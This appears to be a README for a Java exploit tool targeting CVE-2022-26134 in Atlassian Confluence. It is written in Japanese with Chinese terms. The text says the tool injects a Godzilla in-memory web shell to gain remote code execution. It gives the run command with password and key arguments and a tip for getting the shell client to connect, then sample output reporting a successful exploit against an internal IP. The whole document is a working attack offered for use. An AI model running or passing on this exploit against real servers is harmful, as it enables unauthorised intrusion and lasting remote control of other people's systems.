
JavaベースのCVE-2022-26134エクスプロイトで、ConfluenceサーバーにGodzillaウェブシェルを注入し、パスワードとキー認証によるリモートコード実行を可能にします。
java -jar CVE-2022-26134.jar 哥斯拉密码 哥斯拉密钥
example
java -jar CVE-2022-26134.jar pass key
メモリーシェルが正常に注入されたが、哥斯拉に接続できない場合は、リクエスト設定に以下のプロトコルヘッダーを追加するか、哥斯拉にBurpプロキシを設定してください。
Connection: close

C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key
C:\CVE_2022_26134_jar>
